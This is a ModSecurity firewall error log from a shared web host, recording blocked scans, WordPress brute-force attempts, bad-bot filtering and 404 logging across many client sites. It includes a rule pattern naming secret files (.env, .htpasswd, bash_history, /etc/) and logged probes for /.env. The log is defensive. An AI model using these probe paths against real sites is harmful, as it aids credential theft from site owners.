[Tue May 26 13:28:13.555335 2026] [security2:error] [pid 512745:tid 512926] [client 169.159.128.176:38104] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSlXKSB_s2CvZg7xNlkwAAAT0"]
[Tue May 26 13:28:13.642707 2026] [security2:error] [pid 512745:tid 512926] [client 169.159.128.176:38104] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSlXKSB_s2CvZg7xNlkwAAAT0"]
[Tue May 26 13:28:14.902504 2026] [security2:error] [pid 512745:tid 512918] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSlnKSB_s2CvZg7xNlnQAAATU"]
[Tue May 26 13:28:15.215719 2026] [security2:error] [pid 512745:tid 512898] [client 169.159.128.176:38160] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSl3KSB_s2CvZg7xNlpgAAASE"]
[Tue May 26 13:28:15.297044 2026] [security2:error] [pid 512745:tid 512898] [client 169.159.128.176:38160] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSl3KSB_s2CvZg7xNlpgAAASE"]
[Tue May 26 13:28:15.811434 2026] [security2:error] [pid 512344:tid 512589] [client 45.154.98.38:61458] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVSl8bElyei4S77DQf-VwAAAHM"]
[Tue May 26 13:28:16.300746 2026] [security2:error] [pid 512344:tid 512546] [client 45.154.98.38:62052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahVSmMbElyei4S77DQf-WwAAAEg"]
[Tue May 26 13:28:16.529875 2026] [security2:error] [pid 512745:tid 512983] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVSl3KSB_s2CvZg7xNlpwABdhM"]
[Tue May 26 13:28:16.601523 2026] [security2:error] [pid 512344:tid 512550] [client 45.154.98.38:62530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmMbElyei4S77DQf-YQAAAEw"]
[Tue May 26 13:28:16.888125 2026] [security2:error] [pid 512344:tid 512510] [client 169.159.128.176:38204] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSmMbElyei4S77DQf-YgAAACQ"]
[Tue May 26 13:28:16.898443 2026] [security2:error] [pid 512344:tid 512512] [client 45.154.98.38:62728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmMbElyei4S77DQf-YwAAACY"]
[Tue May 26 13:28:16.959732 2026] [security2:error] [pid 512344:tid 512510] [client 169.159.128.176:38204] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSmMbElyei4S77DQf-YgAAACQ"]
[Tue May 26 13:28:17.195279 2026] [security2:error] [pid 512745:tid 512929] [client 45.154.98.38:62930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmXKSB_s2CvZg7xNlqgAAAUA"]
[Tue May 26 13:28:17.500352 2026] [security2:error] [pid 512344:tid 512561] [client 45.154.98.38:63105] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmcbElyei4S77DQf-aQAAAFc"]
[Tue May 26 13:28:17.538636 2026] [security2:error] [pid 512745:tid 512981] [client 176.65.139.234:39730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sebiregisteredadvisor.jiyani.in"] [uri "/.env"] [unique_id "ahVSmXKSB_s2CvZg7xNlrAAAAXQ"]
[Tue May 26 13:28:17.801804 2026] [security2:error] [pid 512344:tid 512580] [client 45.154.98.38:63277] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmcbElyei4S77DQf-bAAAAGo"]
[Tue May 26 13:28:17.855008 2026] [security2:error] [pid 512745:tid 512889] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSmXKSB_s2CvZg7xNlqwAAARg"]
[Tue May 26 13:28:18.091988 2026] [security2:error] [pid 512745:tid 512919] [client 45.154.98.38:63477] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmnKSB_s2CvZg7xNlrgAAATY"]
[Tue May 26 13:28:18.384313 2026] [security2:error] [pid 512745:tid 512986] [client 45.154.98.38:63675] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmnKSB_s2CvZg7xNlrwAAAXk"]
[Tue May 26 13:28:18.574486 2026] [security2:error] [pid 512344:tid 512474] [client 169.159.128.176:38240] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSmsbElyei4S77DQf-cgAAAAA"]
[Tue May 26 13:28:18.718505 2026] [security2:error] [pid 512745:tid 512957] [client 45.154.98.38:63876] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVSmnKSB_s2CvZg7xNlsgAAAVw"]
[Tue May 26 13:28:19.020355 2026] [security2:error] [pid 512745:tid 512951] [client 45.154.98.38:64169] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVSm3KSB_s2CvZg7xNltwAAAVY"]
[Tue May 26 13:28:19.320817 2026] [security2:error] [pid 512745:tid 512946] [client 45.154.98.38:64420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVSm3KSB_s2CvZg7xNlugAAAVE"]
[Tue May 26 13:28:19.617918 2026] [security2:error] [pid 512745:tid 512914] [client 45.154.98.38:64622] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVSm3KSB_s2CvZg7xNlwAAAATE"]
[Tue May 26 13:28:19.752758 2026] [security2:error] [pid 512344:tid 512474] [client 169.159.128.176:38240] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSmsbElyei4S77DQf-cgAAAAA"]
[Tue May 26 13:28:19.752811 2026] [security2:error] [pid 512344:tid 512474] [client 169.159.128.176:38240] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSmsbElyei4S77DQf-cgAAAAA"]
[Tue May 26 13:28:19.853042 2026] [security2:error] [pid 512745:tid 513002] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSm3KSB_s2CvZg7xNlvQAAAYk"]
[Tue May 26 13:28:20.330435 2026] [security2:error] [pid 512745:tid 512822] [remote 74.7.241.58:39860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVSnHKSB_s2CvZg7xNlyQABSEw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:28:21.222738 2026] [security2:error] [pid 512745:tid 512900] [client 169.159.128.176:38336] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSnXKSB_s2CvZg7xNlzwAAASM"]
[Tue May 26 13:28:21.297817 2026] [security2:error] [pid 512745:tid 512900] [client 169.159.128.176:38336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSnXKSB_s2CvZg7xNlzwAAASM"]
[Tue May 26 13:28:21.448229 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVSm3KSB_s2CvZg7xNlxQAAAYc"]
[Tue May 26 13:28:22.265603 2026] [security2:error] [pid 512745:tid 512885] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSnXKSB_s2CvZg7xNl2AAAARQ"]
[Tue May 26 13:28:22.720858 2026] [security2:error] [pid 512745:tid 512983] [client 185.191.171.1:57926] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVSnnKSB_s2CvZg7xNl7gAAAXY"]
[Tue May 26 13:28:22.720964 2026] [security2:error] [pid 512745:tid 512983] [client 185.191.171.1:57926] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVSnnKSB_s2CvZg7xNl7gAAAXY"]
[Tue May 26 13:28:23.462593 2026] [security2:error] [pid 512745:tid 512844] [remote 116.202.226.180:37826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.226.202.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVSn3KSB_s2CvZg7xNl8wABUWI"]
[Tue May 26 13:28:24.286704 2026] [security2:error] [pid 512745:tid 512945] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSn3KSB_s2CvZg7xNl-QAAAVA"]
[Tue May 26 13:28:26.646994 2026] [security2:error] [pid 512745:tid 512906] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSonKSB_s2CvZg7xNmEAAAASk"]
[Tue May 26 13:28:28.983184 2026] [security2:error] [pid 512344:tid 512579] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSpMbElyei4S77DQf-wgAAAGk"]
[Tue May 26 13:28:29.994360 2026] [security2:error] [pid 512745:tid 512846] [remote 95.216.117.13:47908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVSpXKSB_s2CvZg7xNmIwABhGQ"]
[Tue May 26 13:28:31.067113 2026] [security2:error] [pid 512745:tid 512960] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSpnKSB_s2CvZg7xNmMAAAAV8"]
[Tue May 26 13:28:32.716674 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSqHKSB_s2CvZg7xNmWQAAAYc"]
[Tue May 26 13:28:33.090719 2026] [security2:error] [pid 512745:tid 512830] [remote 95.216.117.13:47920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVSqXKSB_s2CvZg7xNmZgABR1Q"]
[Tue May 26 13:28:35.499154 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSq3KSB_s2CvZg7xNmfwAAARI"]
[Tue May 26 13:28:37.312587 2026] [security2:error] [pid 512344:tid 512541] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSrMbElyei4S77DQf_JgAAAEM"]
[Tue May 26 13:28:38.584948 2026] [security2:error] [pid 512745:tid 512982] [client 207.46.13.83:29246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "emlak.cagmedya.com"] [uri "/index.php/sitemap_index.xml"] [unique_id "ahVSrnKSB_s2CvZg7xNmvwABdQA"]
[Tue May 26 13:28:40.233930 2026] [security2:error] [pid 512344:tid 512515] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSr8bElyei4S77DQf_MwAAACk"]
[Tue May 26 13:28:42.560344 2026] [security2:error] [pid 512745:tid 512984] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSsnKSB_s2CvZg7xNm7gAAAXc"]
[Tue May 26 13:28:43.580488 2026] [security2:error] [pid 512344:tid 512588] [client 69.12.59.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVSssbElyei4S77DQf_SgAAAHI"], referer: https://www.google.com/
[Tue May 26 13:28:44.555137 2026] [security2:error] [pid 512745:tid 512970] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVStHKSB_s2CvZg7xNnLQAAAWk"]
[Tue May 26 13:28:44.842492 2026] [security2:error] [pid 512344:tid 512483] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVStMbElyei4S77DQf_WQAACTA"]
[Tue May 26 13:28:45.181967 2026] [security2:error] [pid 512344:tid 512549] [client 176.65.139.234:20150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.finclass.africa.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVStcbElyei4S77DQf_YgAAAEs"]
[Tue May 26 13:28:46.851025 2026] [security2:error] [pid 512745:tid 512995] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVStnKSB_s2CvZg7xNnRAAAAYI"]
[Tue May 26 13:28:47.901234 2026] [security2:error] [pid 512745:tid 512937] [client 123.31.139.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSt3KSB_s2CvZg7xNnTwAAAUg"]
[Tue May 26 13:28:49.096250 2026] [security2:error] [pid 512745:tid 512891] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSuHKSB_s2CvZg7xNnXwAAARo"]
[Tue May 26 13:28:51.409445 2026] [security2:error] [pid 512745:tid 512988] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSunKSB_s2CvZg7xNnqAAAAXs"]
[Tue May 26 13:28:53.541598 2026] [security2:error] [pid 512745:tid 512934] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSvXKSB_s2CvZg7xNn-AAAAUU"]
[Tue May 26 13:28:53.820722 2026] [security2:error] [pid 512344:tid 512504] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVSvMbElyei4S77DQf_sgAAHjo"]
[Tue May 26 13:28:55.047596 2026] [security2:error] [pid 512745:tid 512905] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSvnKSB_s2CvZg7xNoEAAAASg"]
[Tue May 26 13:28:57.306570 2026] [security2:error] [pid 512745:tid 512983] [client 74.7.230.55:33972] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kmmc.co.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVSwXKSB_s2CvZg7xNoSgABdnI"]
[Tue May 26 13:28:57.641377 2026] [autoindex:error] [pid 512344:tid 512421] [remote 74.7.243.251:58566] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:28:57.990041 2026] [security2:error] [pid 512745:tid 512971] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSwXKSB_s2CvZg7xNoUAAAAWo"]
[Tue May 26 13:28:59.618925 2026] [security2:error] [pid 512745:tid 512995] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSw3KSB_s2CvZg7xNocwAAAYI"]
[Tue May 26 13:29:01.413880 2026] [security2:error] [pid 512745:tid 512752] [remote 152.53.111.131:49854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVSxXKSB_s2CvZg7xNoiAABZQY"]
[Tue May 26 13:29:01.588366 2026] [security2:error] [pid 512745:tid 512934] [client 95.70.131.179:63925] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSxXKSB_s2CvZg7xNohQAAAUU"]
